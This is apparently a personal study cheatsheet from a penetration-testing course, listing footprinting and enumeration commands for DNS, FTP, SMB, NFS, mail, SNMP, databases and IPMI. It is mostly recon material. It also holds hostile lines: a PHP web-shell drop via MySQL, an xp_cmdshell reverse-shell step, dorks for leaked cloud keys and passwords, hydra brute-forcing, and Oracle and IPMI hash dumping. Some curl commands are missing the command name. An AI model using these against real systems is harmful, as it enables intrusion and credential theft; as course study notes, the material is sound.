Footprinting common services

This post covers footprinting techniques from the CPTS course along with my cheatsheet for common enumeration methods.

Infrastructure Based Enumeration

Domain Information

Finding Valid Subdomains

openssl s_client -connect example.com:443 -showcerts

https://crt.sh/

crt.sh is a public database of SSL certificates. You can search for a domain to see all associated subdomains.

View results in JSON

 -s https://crt.sh/\?q\=example.com\&output\=json | jq .

Using Nmap and NSE to retrieve ssl information

nmap --script ssl-cert -p 443 example.com

Querying DNS records

dig any inlanefreight.com

DNS record types:

A Record (Address Record) – Maps a domain name to an IPv4 address so computers know where to find a website.
MX Record (Mail Exchange) – Specifies which mail servers handle email for a domain.
NS Record (Name Server) – Points to the DNS servers responsible for managing a domain’s records.
TXT Record (Text Record) – Stores extra information, often for verification (e.g., SPF for email security or site ownership proof).

Cloud Resources

Google dorks for finding Cloud resources

AWS S3 Buckets

site:s3.amazonaws.com "companyname"
inurl:".s3.amazonaws.com" filetype:xml

Azure Blob Storage

site:blob.core.windows.net "companyname"

Google Cloud Storage (GCS) Buckets

site:storage.googleapis.com "companyname"

Publicly Indexed Environment Files (May Contain Cloud Keys)

filetype:env "AWS_ACCESS_KEY_ID" OR "AZURE_STORAGE_KEY" OR "GOOGLE_CLOUD_PROJECT"

Exposed Log Files

filetype:log "password" OR "secret"

Third party tools for enumerating Cloud resources

https://domain.glass/

Domain.glass is a tool that aggregates DNS records and subdomains

https://buckets.grayhatwarfare.com/

GrayHatWarfare is a search engine that indexes publicly exposed cloud storage buckets from AWS, Azure, and GCP. It can be used to find files left open to the internet.

Host Based Enumeration

FTP - File Transfer Protocol - Port 21

ftp <IP>

Enter anonymous when prompted for Username to login anonymously (if anonymous login is enabled).

Recursive listing

ftp> ls -R

Download file

ftp> get <filename>

Upload file

ftp> put <filename>

Exit

ftp> exit

Download All Available Files

wget -m --no-passive ftp://username:password@<IP>

If the password has special characters (@, :, !, etc.), URL-encode them.

Use debug/trace for detailed output

Debug

ftp> debug

Trace

ftp> trace

Using nmap scipts

locate *.nse | grep ftp

Using these scripts

nmap --script "ftp-*" -p 21 <IP>

Interacting with FTP with TLS/SSL enabled

openssl s_client -connect 10.129.14.136:21 -starttls ftp

SMB - Server Message Block - Port 445 / 139

Enumerating shares

smbclient -N -L //<IP>

Connecting to share

smbclient //<IP>/<sharename>

list files

smb: \> ls

download file

smb: \> get <filename>

Using nmap scipts

locate *.nse | grep smb

Using these scripts

nmap --script "smb-*" -p 21 <IP>

Using rpcclient for enumeration. -U "" is for null authentication. Enter username if credentials are available.

rpcclient -U "" <IP>

RPCClient - Server Information

rpcclient $> srvinfo

RPCClient - Enumerate domains on the network

rpcclient $> enumdomains

RPCClient - Get domain, server and user information

rpcclient $> querydominfo

RPCClient - Enumerate all shares

rpcclient $> netshareenumall

RPCClient - Get information about a specific share

rpcclient $> netsharegetinfo <share>

RPCClient - Enumerate domain users

rpcclient $> enumdomusers

RPCClient - Query a specific user

rpcclient $> queryuser <RID>

RPCClient - Query a specific group

rpcclient $> querygroup <>

Brute Forcing User RIDs with script

for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Brute Forcing User RIDs with Impacket

samrdump.py <IP>

Enumeration with SMBmap

smbmap -H <IP>

Using Enum4Linux-ng

./enum4linux-ng.py <IP> -A

Using NetExec

Enumerating shares

nxc smb <IP> -u '' -p '' --shares

Enumerating users through RID Bruteforcing

nxc smb <IP> -u '' -p '' --rid-brute

Enumerating Password policy

nxc smb <IP> -u '' -p '' --pass-pol

Enumerating Local groups

nxc smb <IP> -u '' -p '' --local-group

Using nmap scipts

locate *.nse | grep nfs

Using these scripts

sudo nmap --script nfs* <IP> -sV -p111,2049

Show available NFS Share

showmount -e <IP>

Mounting NFS Share

mkdir target-NFS
sudo mount -t nfs <IP>:/ ./target-NFS/ -o nolock
cd target-NFS

-o nolock is used to prevent issues with NFS file locking in certain environments.

List Contents with Usernames & Group Names

ls -l target-NFS/

List Contents with UIDs & GUIDs

ls -n target-NFS/

Unmounting file share

cd ..
sudo umount ./target-NFS

DNS - Domain Name System - Port 53

Domain Name System (DNS) is responsible for mapping domain names to IP addresses. It consists of several server types:

Server Type	Description
DNS Root Server	Handles top-level domains (TLDs), last-resort query resolution.
Authoritative Nameserver	Holds the official records for a specific domain.
Non-authoritative Nameserver	Caches DNS records from authoritative sources.
Caching DNS Server	Temporarily stores DNS query results.
Forwarding Server	Passes queries to another DNS server.
Resolver	Resolves DNS queries locally (in routers, computers, etc.).

Common DNS Record Types

DNS Record	Description
A	Maps a domain to an IPv4 address.
AAAA	Maps a domain to an IPv6 address.
MX	Specifies mail servers for the domain.
NS	Identifies name servers for a domain.
TXT	Stores arbitrary text data (e.g., SPF, DKIM, DMARC validation).
CNAME	Creates an alias for another domain name.
PTR	Reverse lookup: maps an IP to a domain name.
SOA	Contains zone information and admin email.

DNS Enumeration Commands

Find Name Servers

dig ns <target-domain>
host -t ns <target-domain>

Retrieve All DNS Records

dig any <target-domain>
host -a <target-domain>

Enumerate a Specific Record Type

dig <record-type> <target-domain>
host -t <record-type> <target-domain>

Examples:

dig mx example.com    # Find mail servers
dig txt example.com   # Find TXT records
dig soa example.com   # Find SOA record

Reverse Lookup (PTR Record)

dig -x <IP>
host <IP>

Perform Zone Transfer (AXFR)

dig axfr <target-domain> @<dns-server>

Find Subdomains via Certificate Transparency Logs

 -s "https://crt.sh/?q=<target-domain>&output=json" | jq .

Brute-Force Subdomains

Using SecLists:

for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt); do
  dig $sub.<target-domain> @<dns-server> | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt
done

Using dnsenum:

dnsenum --dnsserver <dns-server> --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt <target-domain>

DNS Enumeration with Nmap

Locate DNS NSE Scripts

locate *.nse | grep dns

Run DNS Enumeration Scripts

nmap --script "dns-*" -p 53 <target-domain>

SMTP - Simple Mail Transfer Protocol - Port 25 / 465 / 587

Understanding SMTP

Simple Mail Transfer Protocol (SMTP) is used for sending emails between clients and servers. It operates mainly on the following ports:

Port	Usage
25	Default SMTP port (often blocked for outbound mail).
465	Secure SMTP (SMTPS) using SSL/TLS encryption.
587	SMTP with STARTTLS (modern encryption standard).

SMTP is often used in combination with POP3 (Port 110) or IMAP (Port 143) to receive emails.

Common SMTP Commands

Command	Description
HELO/EHLO	Initiates a session with the SMTP server.
MAIL FROM	Specifies the sender’s email address.
RCPT TO	Specifies the recipient’s email address.
DATA	Signals the start of email body transmission.
VRFY	Checks if an email address exists (User Enumeration).
EXPN	Expands a mailing list to show all recipients.
RSET	Aborts the current email transaction.
NOOP	Keeps the connection open without performing any action.
QUIT	Terminates the session.

Note: Many modern SMTP servers disable VRFY and EXPN due to security concerns. If disabled, consider alternative enumeration techniques (e.g., brute-force or metadata analysis).

SMTP Enumeration Commands

Banner Grabbing

nc -nv <IP> 25
telnet <IP> 25

Reveals the SMTP server version and potential misconfigurations.

Example Output:

220 mail.example.com ESMTP Postfix

Find Available SMTP Commands

ehlo example.com

Lists supported commands like VRFY, EXPN, STARTTLS, etc.

Enumerate Valid Users Using VRFY (If Allowed)

vrfy root
vrfy admin
vrfy user123

If the user exists, the server responds with “252 2.0.0 ”.

Using EXPN (Expands Mailing Lists)

expn admin
expn users
expn mailinglist

May return a full list of emails if enabled.

Brute-Force User Enumeration with SMTP

for user in $(cat users.txt); do 
  echo "VRFY $user" | nc -nv <IP> 25;
done

Sending Emails via SMTP Connect to SMTP Server

telnet <IP> 25

Start a Mail Session

HELO example.com
MAIL FROM: <attacker@example.com>
RCPT TO: <victim@example.com>
DATA

Write and Send Email

Subject: Test Email
This is a test email sent via SMTP enumeration.

.
QUIT

The . (dot) on a new line signifies the end of the message.

Checking for Open Relays (Misconfigurations)

An open relay allows anyone to send emails without authentication, often leading to spam and phishing attacks.

Test Open Relay with Telnet

MAIL FROM: <attacker@example.com>
RCPT TO: <victim@anydomain.com>
DATA
Subject: Open Relay Test
This is a test email.

.
QUIT

If accepted, the server is an open relay, allowing unauthorized emails.

Use Nmap to Check for Open Relay

nmap --script smtp-open-relay -p 25 <IP>

Example Output:

smtp-open-relay: Server is an open relay (16/16 tests)

Locate SMTP NSE Scripts

locate *.nse | grep smtp

Run Common SMTP Enumeration Scripts

nmap --script "smtp-*" -p 25,465,587 <IP>

Using SMTP User Enum

smtp-user-enum -M VRFY -U users.txt -t <IP>

If VRFY is disabled, hydra can be used to brute-force credentials.

hydra -L users.txt -P passwords.txt -s 25 -S <IP> smtp

IMAP / POP3 - Internet Message Access Protocol - Post Office Protocol - Port 143 / 993 / 110 / 995

Understanding IMAP & POP3

IMAP (Internet Message Access Protocol) and POP3 (Post Office Protocol) are used to retrieve emails from a mail server.

Protocol	Port	Usage
IMAP	143	Retrieves emails while keeping them on the server.
IMAPS (IMAP Secure)	993	IMAP over SSL/TLS encryption.
POP3	110	Retrieves emails and removes them from the server.
POP3S (POP3 Secure)	995	POP3 over SSL/TLS encryption.

Common IMAP Commands

Command	Description
`1 LOGIN <username> <password>`	Authenticates the user.
`1 LIST "" *`	Lists all available mail directories.
`1 CREATE "INBOX"`	Creates a new mailbox.
`1 DELETE "INBOX"`	Deletes a mailbox.
`1 SELECT INBOX`	Selects a mailbox for reading messages.
`1 FETCH <ID> all`	Retrieves all data associated with an email message.
`1 CLOSE`	Removes all messages marked as deleted.
`1 LOGOUT`	Terminates the session with the IMAP server.

Common POP3 Commands

Command	Description
`USER <username>`	Identifies the user.
`PASS <password>`	Authenticates the user.
`STAT`	Displays the number of emails in the mailbox.
`LIST`	Lists all emails with their size.
`RETR <ID>`	Retrieves an email message by ID.
`DELE <ID>`	Deletes an email by ID.
`RSET`	Resets the mailbox state.
`QUIT`	Terminates the session with the POP3 server.

IMAP & POP3 Enumeration Commands

Scan for IMAP & POP3 Services

nmap -sV -p110,143,993,995 <IP>

Detects Dovecot, Exchange, or other mail services.
Shows SSL certificates and mail server details.

Extract IMAP/POP3 Capabilities

openssl s_client -connect <IP>:143 -starttls imap
openssl s_client -connect <IP>:110 -starttls pop3

Reveals supported authentication mechanisms.
Shows TLS/SSL configurations.

Brute-Force IMAP & POP3 Credentials Using hydra:

hydra -L users.txt -P passwords.txt imap://<IP> -V
hydra -L users.txt -P passwords.txt pop3://<IP> -V

Attempts to log in using username/password lists.

Access Mailbox with “

 -k 'imaps://<IP>' --user <user>:<password>

 -k --url "imaps://<IP>/INBOX" --user <user>:<password>

Lists email folders upon successful authentication.

Enumerate Mailbox via IMAP

openssl s_client -connect <IP>:993

Then interact using:

1 LOGIN <user> <password>
1 LIST "" *
1 SELECT INBOX
1 FETCH 1 all

Fetches email messages and metadata.

Enumerate Mailbox via POP3

openssl s_client -connect <IP>:995

Then interact using:

USER <user>
PASS <password>
STAT
LIST
RETR 1

Retrieves email content from the server.

Using Nmap Scripts for IMAP and POP3

locate *.nse | grep imap
locate *.nse | grep pop3

nmap --script "imap-*" -p 143,993 <IP>
nmap --script "pop3-*" -p 110,995 <IP>

SNMP - Simple Network Management Protocol - Port 161 / 162

Understanding SNMP

Simple Network Management Protocol (SNMP) is used for monitoring and managing network devices like routers, switches, servers, and IoT devices.
It operates on:

UDP 161 for requests.
UDP 162 for receiving SNMP traps (unsolicited alerts from devices).

Discover SNMP Services

nmap -sU -p 161 --script=snmp-info <IP>

Extract SNMP System Information (Default Community Strings). Retrieves system info, usernames, installed software, and more.

snmpwalk -v2c -c public <IP>
snmpwalk -v1 -c public <IP>

Bruteforce Community Strings

onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt <IP>

Query a Specific OID

snmpget -v2c -c public <IP> .1.3.6.1.2.1.1.1.0

Enumerate SNMP Users (SNMPv3)

snmpwalk -v3 -u <username> -l authPriv -A <password> -X <encryption_key> -a SHA -x AES <IP>

Extract Running Processes, Dump Installed Software, Extracts local user accounts

snmpwalk -v2c -c public <IP> .1.3.6.1.2.1.25.4.2.1.2

Brute-Force SNMP OIDs

braa public@<IP>:.1.3.6.*

Using Nmap scrips

locate *.nse | grep snmp

nmap --script "snmp-*" -p 161 <IP>

MySQL - Relational Database Management System - Port 3306

Using nmap scripts

sudo nmap <IP> -sV -sC -p3306 --script mysql*

Connect to mysql

mysql -u <Username> -p<Password> -h <IP>

See available databases

MySQL [(none)]> show databases;

See DB Version

MySQL [(none)]> select version();

Select database

SQL [(none)]> use mysql;

Enumerate tables

MySQL [mysql]> show tables;

Enumerate tables

MySQL [mysql]> show tables;

Show columns in a selected dataset

MySQL [mysql]> show columns from <table>;

Show all information in a table

MySQL [mysql]> select * from <table>;

Search for needed string in the desired table.

MySQL [mysql]> select * from <table> where <column> = "<string>";

Bruteforcing credentials with hydra

hydra -L users.txt -P passwords.txt -s 3306 -f <IP> mysql

If we have file write permissions, we can drop a PHP shell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

MSSQL - Microsoft SQL Server - Port 1433

Scanning for MSSQL Services

nmap -p 1433 --script ms-sql-* <IP>

If you have valid credentials, you can connect and enumerate the databases:

python3 mssqlclient.py <Username>:<password>@<IP>

List databases after connecting:

SQL> select name from sys.databases;

Check current user privileges:

SELECT IS_SRVROLEMEMBER('sysadmin');   -- Check if user is sysadmin
SELECT IS_SRVROLEMEMBER('db_owner');   -- Check if user is database owner
SELECT IS_SRVROLEMEMBER('db_datareader'); -- Check if user can read all tables
SELECT IS_SRVROLEMEMBER('db_datawriter'); -- Check if user can modify data

If 1 is returned, you have the respective privilege.

If xp_cmdshell is enabled, you can execute system commands:

EXEC xp_cmdshell 'whoami';

If xp_cmdshell is disabled, we can enable it:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Basic MSSQL Enumeration

List all databases

SELECT name FROM master.sys.databases;

Switch to a database

USE <database_name>;

List all tables in the current database

SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;

List all columns in a specific table

SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Users';

List all stored procedures

SELECT name FROM sys.procedures;

Check MSSQL version

SELECT @@VERSION;

Revshell from xp_cmdshell Get Base64 payload from http://revshells.com/

EXEC xp_cmdshell 'powershell -enc BASE64_PAYLOAD';

Oracle TNS - Transparent Network Substrate - Port 1521

Scanning for Oracle TNS Services

nmap -p 1521 --script oracle-tns-version <IP>

Brute-force Oracle SIDs:

nmap --script oracle-sid-brute -p 1521 <IP>

Scan for known vulnerabilities:

nmap -p 1521 --script oracle-vuln-* <IP>

Oracle Enumeration with ODAT

ODAT (Oracle Database Attacking Tool) is useful for enumeration and exploitation.

git clone https://github.com/quentinhardy/odat.git
cd odat/
pip3 install -r requirements.txt

Check if the target is properly configured:

./odat.py all -s <IP>

Find valid credentials:

./odat.py passwordguesser -s <IP> -d XE -U users.txt -P passlist.txt

Brute-forcing Oracle Credentials

Using Hydra:

hydra -L users.txt -P passwords.txt <IP> oracle-listener

Connecting to Oracle Database

Using SQLPlus:

sqlplus <username>/<password>@<IP>/<SID>

Example:

sqlplus <USERNAME>/<PASSWORD>@<TARGET_IP>/<DATABASE_SID>

Connecting as SYSDBA:

sqlplus <USERNAME>/<PASSWORD>@<TARGET_IP>/<DATABASE_SID> as sysdba

Enumerate Database Information

List databases:

SELECT name FROM v$database;

List tables in current database:

SELECT table_name FROM all_tables;

List user privileges:

SELECT * FROM user_role_privs;

Extract password hashes:

SELECT name, password FROM sys.user$;

Exploiting Oracle Database

Uploading a File to the Server

Upload a test file:

echo "Test Upload" > test.txt
./odat.py utlfile -s <IP> -d XE -U <username> -P <password> --sysdba --putFile C:\\inetpub\\wwwroot test.txt ./test.txt

Check if file upload was successful:

curl -X GET http://<IP>/test.txt

IPMI - Intelligent Platform Management Interface - Port 623

Scanning for IPMI Services

nmap -sU -p 623 --script ipmi-* <IP>

Using Metasploit:

use auxiliary/scanner/ipmi/ipmi_version
set rhosts <IP>
run

Default Credentials to Try

Product	Username	Password
Dell iDRAC	root	calvin
HP iLO	Administrator	8-character random string
Supermicro IPMI	ADMIN	ADMIN

Bruteforce IPMI Credentials

hydra -L users.txt -P passwords.txt <IP> ipmi -V

Dumping IPMI Password Hashes

Using Metasploit:

use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts <IP>
run

Cracking IPMI Hashes with Hashcat

hashcat -m 7300 ipmi_hashes.txt rockyou.txt --force

This is not complete yet. I plan to add more stuff about Remote management protocols and detailed explanation of things I havent totally understood next week.

Footprinting theory + cheatsheet

Footprinting common services

This post covers footprinting techniques from the CPTS course along with my cheatsheet for common enumeration methods.

Infrastructure Based Enumeration

Domain Information

Finding Valid Subdomains

Cloud Resources

Google dorks for finding Cloud resources

Third party tools for enumerating Cloud resources

Host Based Enumeration

FTP - File Transfer Protocol - Port 21

SMB - Server Message Block - Port 445 / 139

Using NetExec

NFS - Network File Share - Port 111 / 2049

DNS - Domain Name System - Port 53

Common DNS Record Types

DNS Enumeration Commands

Brute-Force Subdomains

DNS Enumeration with Nmap

SMTP - Simple Mail Transfer Protocol - Port 25 / 465 / 587

Understanding SMTP

Common SMTP Commands

SMTP Enumeration Commands

Checking for Open Relays (Misconfigurations)

Using SMTP User Enum

IMAP / POP3 - Internet Message Access Protocol - Post Office Protocol - Port 143 / 993 / 110 / 995

Understanding IMAP & POP3

Common IMAP Commands

Common POP3 Commands

IMAP & POP3 Enumeration Commands

SNMP - Simple Network Management Protocol - Port 161 / 162

Understanding SNMP

Discover SNMP Services

MySQL - Relational Database Management System - Port 3306

MSSQL - Microsoft SQL Server - Port 1433

Scanning for MSSQL Services

Basic MSSQL Enumeration

Oracle TNS - Transparent Network Substrate - Port 1521

Scanning for Oracle TNS Services

Oracle Enumeration with ODAT

Brute-forcing Oracle Credentials

Connecting to Oracle Database

Enumerate Database Information

Exploiting Oracle Database

Uploading a File to the Server

IPMI - Intelligent Platform Management Interface - Port 623

Scanning for IPMI Services

Default Credentials to Try

Bruteforce IPMI Credentials

Dumping IPMI Password Hashes

Cracking IPMI Hashes with Hashcat

This is not complete yet. I plan to add more stuff about Remote management protocols and detailed explanation of things I havent totally understood next week.